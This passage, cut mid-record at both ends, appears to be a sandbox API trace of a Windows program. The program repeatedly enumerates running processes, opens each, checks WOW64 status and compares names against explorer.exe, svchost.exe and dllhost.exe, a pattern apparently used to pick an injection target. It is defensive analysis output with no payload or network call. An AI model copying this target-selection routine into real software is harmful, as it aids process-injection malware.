cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0260.907] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0260.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0260.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0260.909] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.909] CloseHandle (hObject=0xd8) returned 1 [0260.909] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0260.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0260.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0260.909] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.909] CloseHandle (hObject=0xd8) returned 1 [0260.909] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0260.909] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0260.909] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0260.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0260.910] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.910] CloseHandle (hObject=0xd8) returned 1 [0260.910] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0260.911] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.911] CloseHandle (hObject=0xd8) returned 1 [0260.911] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0260.911] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0260.911] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.911] CloseHandle (hObject=0xd8) returned 1 [0260.911] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.912] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0260.912] CloseHandle (hObject=0xd4) returned 1 [0260.912] Sleep (dwMilliseconds=0x3e8) [0261.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0261.919] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0261.920] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0261.920] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0261.921] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0261.921] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0261.922] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0261.922] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0261.923] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0261.923] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0261.924] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0261.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0261.924] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0261.925] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0261.925] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0261.926] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0261.926] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0261.927] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0261.927] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0261.928] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0261.928] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0261.929] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.929] CloseHandle (hObject=0xd8) returned 1 [0261.929] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0261.929] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0261.929] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0261.929] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0261.930] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0261.930] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.930] CloseHandle (hObject=0xd8) returned 1 [0261.930] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0261.930] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0261.930] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0261.930] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0261.931] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0261.931] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0261.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0261.932] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.932] CloseHandle (hObject=0xd8) returned 1 [0261.932] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0261.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0261.932] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.932] CloseHandle (hObject=0xd8) returned 1 [0261.933] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0261.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0261.933] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.933] CloseHandle (hObject=0xd8) returned 1 [0261.933] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0261.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0261.934] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.934] CloseHandle (hObject=0xd8) returned 1 [0261.934] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0261.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0261.934] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.934] CloseHandle (hObject=0xd8) returned 1 [0261.934] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0261.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0261.935] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.935] CloseHandle (hObject=0xd8) returned 1 [0261.935] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0261.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0261.935] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.935] CloseHandle (hObject=0xd8) returned 1 [0261.935] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0261.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0261.936] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.936] CloseHandle (hObject=0xd8) returned 1 [0261.936] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0261.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0261.937] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.937] CloseHandle (hObject=0xd8) returned 1 [0261.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0261.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0261.937] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.937] CloseHandle (hObject=0xd8) returned 1 [0261.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0261.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0261.938] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.938] CloseHandle (hObject=0xd8) returned 1 [0261.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0261.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0261.938] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.938] CloseHandle (hObject=0xd8) returned 1 [0261.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0261.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0261.939] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.939] CloseHandle (hObject=0xd8) returned 1 [0261.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0261.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0261.940] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.940] CloseHandle (hObject=0xd8) returned 1 [0261.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0261.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0261.940] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.940] CloseHandle (hObject=0xd8) returned 1 [0261.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0261.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0261.941] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.941] CloseHandle (hObject=0xd8) returned 1 [0261.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0261.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0261.941] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.941] CloseHandle (hObject=0xd8) returned 1 [0261.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0261.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0261.942] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.942] CloseHandle (hObject=0xd8) returned 1 [0261.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0261.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0261.942] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.942] CloseHandle (hObject=0xd8) returned 1 [0261.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 